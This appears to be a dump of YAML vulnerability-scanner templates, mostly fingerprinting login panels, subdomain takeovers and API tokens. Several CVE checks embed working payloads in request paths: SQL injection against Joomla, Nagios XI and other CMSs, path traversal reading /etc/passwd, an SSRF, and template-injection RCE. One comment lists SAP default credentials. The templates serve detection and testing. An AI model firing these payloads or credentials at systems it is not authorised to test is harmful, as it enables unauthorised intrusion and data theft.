id: xxljob-admin-detect 2 | 3 | info: 4 | name: XXLJOB Admin Login 5 | author: pdteam 6 | severity: info 7 | tags: tech,xxljob 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xxl-job-admin/toLogin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "XXLJOB" 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /api/api-fastly.yaml: -------------------------------------------------------------------------------- 1 | id: api-fastly 2 | 3 | info: 4 | name: Fastly API Test 5 | author: Adam Crosser 6 | reference: https://developer.fastly.com/reference/api/ 7 | severity: info 8 | tags: token-spray,fastly 9 | 10 | self-contained: true 11 | requests: 12 | - method: GET 13 | path: 14 | - "https://api.fastly.com/service" 15 | headers: 16 | Fastly-Key: "{{token}}" 17 | 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /api/strapi-panel.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-panel 2 | 3 | info: 4 | name: Strapi Login Panel 5 | author: idealphase 6 | severity: info 7 | tags: panel,strapi,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/auth/login' 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "Strapi Admin" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /basic-auth-detection.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-detection 2 | 3 | info: 4 | name: Basic auth detection 5 | author: w4cky_ 6 | severity: low 7 | tags: tech,basic-auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | 20 | - type: word 21 | words: 22 | - "Www-Authenticate:" 23 | part: header 24 | -------------------------------------------------------------------------------- /c-unauthorized/spark-api-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: spark-api-unauth 2 | 3 | info: 4 | name: spark Api Unauth 5 | author: betta(https://github.com/betta-cyber) 6 | severity: high 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /v1/submissions 14 | expression: response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 15 | expression: r0() -------------------------------------------------------------------------------- /cve/2019/CVE-2019-18394.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-18394 2 | 3 | info: 4 | name: Openfire Full Read SSRF 5 | author: su(https://suzzz112113.github.io/#blog) 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /getFavicon?host=baidu.com/? 13 | expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /dreambox-detect.yaml: -------------------------------------------------------------------------------- 1 | id: dreambox-detect 2 | 3 | info: 4 | name: DreamBox Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: dreambox,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | part: body 22 | words: 23 | - 'Dreambox WebControl' 24 | -------------------------------------------------------------------------------- /e-vulnerability/dedecms-url-redirection.yaml: -------------------------------------------------------------------------------- 1 | id: dedecms-url-redirection 2 | 3 | info: 4 | name: DedeCMS URL Redirection 5 | author: cc_ci(https://github.com/cc8ci) 6 | severity: low 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D 13 | expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com" 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /e-vulnerability/docker-registry.yaml: -------------------------------------------------------------------------------- 1 | id: docker-registry 2 | 3 | info: 4 | name: Docker Registry Listing 5 | author: zan8in 6 | severity: medium 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /v2/_catalog 13 | follow_redirects: true 14 | expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b'"repositories":') 15 | expression: r0() 16 | 17 | -------------------------------------------------------------------------------- /ems-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ems-login-panel 2 | 3 | info: 4 | name: EMS Login page detection 5 | author: __Fazal 6 | severity: info 7 | tags: panel,ems,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/EMSWebClient/Login.aspx' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "EMS Web Client - Login" 23 | -------------------------------------------------------------------------------- /instagram.yaml: -------------------------------------------------------------------------------- 1 | id: api-instagramgraph 2 | 3 | info: 4 | name: Instagram Graph API Test 5 | author: zzeitlin 6 | reference: https://developers.facebook.com/docs/instagram-api/getting-started 7 | severity: info 8 | tags: token-spray,instagram,graph 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /jaspersoft-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jaspersoft-detect 2 | 3 | info: 4 | name: Jaspersoft detected 5 | author: koti2 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/jasperserver/login.html?error=1" 12 | matchers: 13 | - type: word 14 | words: 15 | - "TIBCO Jaspersoft: Login" 16 | - "Could not login to JasperReports Server" 17 | - "About TIBCO JasperReports Server" 18 | condition: or 19 | -------------------------------------------------------------------------------- /lokalise.yaml: -------------------------------------------------------------------------------- 1 | id: api-lokalise 2 | 3 | info: 4 | name: Lokalise API Test 5 | author: zzeitlin 6 | reference: https://app.lokalise.com/api2docs/curl/#resource-projects 7 | severity: info 8 | tags: token-spray,lokalise 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.lokalise.com/api2/projects/" 14 | headers: 15 | X-Api-Token: "{{token}}" 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /microsoft-teams-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-teams-webhook 2 | 3 | info: 4 | name: Microsoft Teams Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,microsoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+' 18 | -------------------------------------------------------------------------------- /octoprint-login.yaml: -------------------------------------------------------------------------------- 1 | id: octoprint-panel 2 | 3 | info: 4 | name: OctoPrint Login 5 | author: affix 6 | severity: info 7 | tags: octoprint,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/login/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'OctoPrint Login' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /openerp-database.yaml: -------------------------------------------------------------------------------- 1 | id: openerp-database 2 | 3 | info: 4 | name: OpenERP database instances 5 | author: impramodsargar 6 | severity: info 7 | tags: openerp,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/web/database/selector/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Odoo' 19 | 20 | - type: status 21 | status: 22 | - 200 -------------------------------------------------------------------------------- /sap-netweaver-portal.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-portal 2 | 3 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& 4 | 5 | info: 6 | name: SAP NetWeaver Portal 7 | author: organiccrap 8 | severity: info 9 | tags: panel,sap 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/irj/portal" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SAP NetWeaver Portal" 19 | part: body 20 | -------------------------------------------------------------------------------- /valid-gmail-check.yaml: -------------------------------------------------------------------------------- 1 | id: valid-gmail-checker 2 | 3 | info: 4 | name: Valid Google Mail Checker 5 | author: dievus,dwisiswant0 6 | severity: info 7 | reference: 8 | - https://github.com/dievus/geeMailUserFinder 9 | 10 | self-contained: true 11 | requests: 12 | - method: HEAD 13 | path: 14 | - "https://mail.google.com/mail/gxlu?email={{email}}" 15 | 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "COMPASS" -------------------------------------------------------------------------------- /webflow-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: webflow-takeover 2 | 3 | info: 4 | name: webflow takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | -

The page you are looking for doesn't exist or has been moved.

-------------------------------------------------------------------------------- /wufoo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wufoo-takeover 2 | 3 | info: 4 | name: wufoo takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Profile not found 20 | - Hmmm....something is not right. 21 | condition: and -------------------------------------------------------------------------------- /zenario-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: zenario-login-panel 2 | 3 | info: 4 | name: Zenario Admin login 5 | author: __Fazal 6 | severity: info 7 | tags: panel,zenario 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/zenario/admin/welcome.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "Welcome to Zenario" 23 | -------------------------------------------------------------------------------- /a-fingerprinting/sonicwall-sslvpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-sslvpn-panel 2 | 3 | info: 4 | name: SonicWall Virtual Office SSLVPN Panel 5 | author: PR3R00T 6 | severity: info 7 | verified: true 8 | description: | 9 | shodan: http.title:"Virtual Office" 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /cgi-bin/welcome 16 | expression: response.status == 200 && response.body.bcontains(b'Virtual Office') 17 | expression: r0() -------------------------------------------------------------------------------- /a-fingerprinting/zentao-detect.yaml: -------------------------------------------------------------------------------- 1 | id: zentao-detect 2 | 3 | info: 4 | name: Zentao detect 5 | author: pikpikcu 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /zentao/index.php?mode=getconfig 14 | expression: response.status == 200 && response.body.bcontains(b'"sessionName":"zentaosid"') && response.body.bcontains(b'{"version":"') && "\"version\":\"([v0-9.]+)\"".bmatches(response.body) 15 | expression: r0() -------------------------------------------------------------------------------- /aftership-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aftership-takeover 2 | 3 | info: 4 | name: Aftership Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Oops.

The page you're looking for doesn't exist. -------------------------------------------------------------------------------- /amazon-docker-config-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-docker-config-disclosure 2 | 3 | info: 4 | name: Dockerrun AWS Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,aws,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/Dockerrun.aws.json' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'AWSEBDockerrunVersion' 17 | - 'containerDefinitions' 18 | condition: and 19 | -------------------------------------------------------------------------------- /calendly.yaml: -------------------------------------------------------------------------------- 1 | id: api-calendly 2 | 3 | info: 4 | name: Calendly API Test 5 | author: zzeitlin 6 | reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me 7 | severity: info 8 | tags: token-spray,calendly 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://calendly.com/api/v1/users/me" 14 | headers: 15 | X-Token: "{{token}}" 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /code42-panel.yaml: -------------------------------------------------------------------------------- 1 | id: code42-panel 2 | 3 | info: 4 | name: Code42 Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,code42 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/404' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: dsl 17 | dsl: 18 | - 'status_code == 404' 19 | 20 | - type: word 21 | words: 22 | - "Code42 homepage" 23 | -------------------------------------------------------------------------------- /crush-ftp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: crush-ftp-detect 2 | 3 | info: 4 | name: Crush FTP 5 | author: pussycat0x 6 | severity: info 7 | tags: tech,ftp 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/WebInterface/login.html" 12 | 13 | redirects: true 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "CrushFTP WebInterface" 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /cve/2015/CVE-2015-7297.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2015-7297 2 | 3 | info: 4 | name: Joomla Core SQL Injection 5 | author: unkown 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) 13 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /cve/2018/CVE-2018-7490.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7490 2 | 3 | info: 4 | name: uWSGI PHP Plugin Directory Traversal 5 | author: unkown 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /edgeos-login.yaml: -------------------------------------------------------------------------------- 1 | id: edgeos-login 2 | 3 | info: 4 | name: EdgeOS login Detect 5 | author: princechaddha 6 | severity: info 7 | tags: login,tech,edgeos,edgemax 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'EdgeOS' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /fuelcms-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fuelcms-panel 2 | 3 | info: 4 | name: Fuel CMS Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,fuelcms,oss 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/fuel/login" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "FUEL CMS" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /google/google-mapsembedadvanced.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlemapsembedadvanced 2 | 3 | info: 4 | name: Google Maps Embed (Advanced) API Test 5 | author: zzeitlin 6 | severity: info 7 | tags: token-spray,google,maps,embed 8 | 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /hivemanager-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: hivemanager-login-panel 2 | 3 | info: 4 | name: HiveManager Login panel 5 | author: binaryfigments 6 | severity: info 7 | tags: panel,hivemanager,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/hm/login.action' 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "HiveManager Login" 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /mapbox.yaml: -------------------------------------------------------------------------------- 1 | id: api-mapbox 2 | 3 | info: 4 | name: Mapbox API Test 5 | author: zzeitlin 6 | reference: https://docs.mapbox.com/api/search/geocoding/ 7 | severity: info 8 | tags: token-spray,mapbox 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | negative: true 20 | -------------------------------------------------------------------------------- /medium-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: medium-takeover 2 | 3 | info: 4 | name: Medium Takeover Detection 5 | author: rtcms 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Oops! We couldn’t find that page 19 | - Sorry about that 20 | condition: and -------------------------------------------------------------------------------- /netscaler-aaa-login.yaml: -------------------------------------------------------------------------------- 1 | id: netscaler-aaa-login 2 | 3 | info: 4 | name: NetScaler AAA Login Panel 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6898 9 | tags: panel,netscaler,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/logon/LogonPoint/tmindex.html' 15 | matchers: 16 | - type: word 17 | words: 18 | - "NetScaler AAA" 19 | condition: and 20 | -------------------------------------------------------------------------------- /php/phpmyadmin-panel-1.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel1 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-3.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel3 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /_phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /proposify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: proposify-takeover 2 | 3 | info: 4 | name: proposify takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - If you need immediate assistance, please contact Welcome to your Strapi app' 20 | condition: and 21 | -------------------------------------------------------------------------------- /asana.yaml: -------------------------------------------------------------------------------- 1 | id: api-asana 2 | 3 | info: 4 | name: Asana API Test 5 | author: zzeitlin 6 | reference: https://developers.asana.com/docs/using-terminal 7 | severity: info 8 | tags: token-spray,asana 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://app.asana.com/api/1.0/users/me" 14 | headers: 15 | Authorization: Bearer {{token}} 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 401 21 | negative: true 22 | -------------------------------------------------------------------------------- /cve/2018/CVE-2018-10736.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-10736 2 | 3 | info: 4 | name: Nagios XI SQL Inject 5 | author: 0x_zmz(github.com/0x-zmz) 6 | severity: high 7 | 8 | set: 9 | r: randomInt(2000000000, 2100000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23 15 | expression: response.body.bcontains(bytes(md5(string(r)))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /cve/2019/CVE-2019-11510.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-11510 2 | 3 | info: 4 | name: Pulse Connect Secure SSL VPN Arbitrary File Read 5 | author: leezp 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /e-vulnerability/consul-rexec-rce.yaml: -------------------------------------------------------------------------------- 1 | id: consul-rexec-rce 2 | 3 | info: 4 | name: Consul rexec RCE 5 | author: imlonghao(https://imlonghao.com/) 6 | severity: high 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /v1/agent/self 14 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")' 15 | expression: r0() 16 | 17 | -------------------------------------------------------------------------------- /e-vulnerability/duomicms-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: duomicms-sqli 2 | 3 | info: 4 | name: Duomicms sqli 5 | author: hanxiansheng26(https://github.com/hanxiansheng26) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 13 | expression: response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /e-vulnerability/fangweicms-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: fangweicms-sqli 2 | 3 | info: 4 | name: FangweiCMS sqli 5 | author: Rexus 6 | severity: high 7 | 8 | set: 9 | rand: randomInt(200000000, 210000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 15 | expression: response.body.bcontains(bytes(md5(string(rand)))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /e-vulnerability/maccms-rce.yaml: -------------------------------------------------------------------------------- 1 | id: maccms-rce 2 | 3 | info: 4 | name: Maccms RCE 5 | author: hanxiansheng26(https://github.com/hanxiansheng26) 6 | severity: critical 7 | 8 | set: 9 | r: randomInt(800000000, 1000000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 15 | expression: response.body.bcontains(bytes(md5(string(r)))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /e-vulnerability/msvod-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: msvod-sqli 2 | 3 | info: 4 | name: msvod sqli 5 | author: jinqi 6 | severity: high 7 | 8 | set: 9 | r1: randomInt(800000000, 1000000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a 15 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /e-vulnerability/nuuo-file-inclusion.yaml: -------------------------------------------------------------------------------- 1 | id: nuuo-file-inclusion 2 | 3 | info: 4 | name: Nuuo file inclusion 5 | author: 2357000166(https://github.com/2357000166) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /css_parser.php?css=css_parser.php 13 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /exposed-hg.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-hg 2 | 3 | info: 4 | name: Exposed HG Directory 5 | author: daffainfo 6 | severity: low 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.hg/hgrc" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "[paths]" 19 | - "default" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /exsi-system.yaml: -------------------------------------------------------------------------------- 1 | id: exsi-system 2 | 3 | info: 4 | name: ESXi System 5 | author: dhiyaneshDK 6 | severity: info 7 | metadata: 8 | shodan-query: html:"esxUiApp" 9 | tags: panel,esxi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/ui/#/login' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - 'ng-app="esxUiApp"' 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /frontify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: frontify-takeover 2 | 3 | info: 4 | name: frontify takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 404 - Page Not Found 20 | - Oops… looks like you got lost 21 | condition: and -------------------------------------------------------------------------------- /gradle-enterprise-panel.yaml: -------------------------------------------------------------------------------- 1 | id: gradle-enterprise-panel 2 | 3 | info: 4 | name: Gradle Enterprise Panel Detect 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,gradle 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Gradle Enterprise" 22 | -------------------------------------------------------------------------------- /node-red-detect.yaml: -------------------------------------------------------------------------------- 1 | id: node-red-detect 2 | 3 | info: 4 | name: Node RED Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,apache,node-red-dashboard 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "Node-RED" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /npm-log-file.yaml: -------------------------------------------------------------------------------- 1 | id: npm-log-file 2 | 3 | info: 4 | name: Publicly accessible NPM Log file 5 | author: sheikhrishad 6 | severity: low 7 | tags: npm,logs,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/npm-debug.log" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "info it worked if it ends with ok" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /oracle-dbass-detect.yaml: -------------------------------------------------------------------------------- 1 | id: oracle-dbass-detect 2 | 3 | info: 4 | name: Oracle DBaaS Monitor Detect 5 | author: pussycat0x 6 | severity: info 7 | tags: oracle,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/dbaas_monitor/login' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'DBaaS Monitor' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /php/phpmyadmin-panel-10.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel10 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /web/phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" 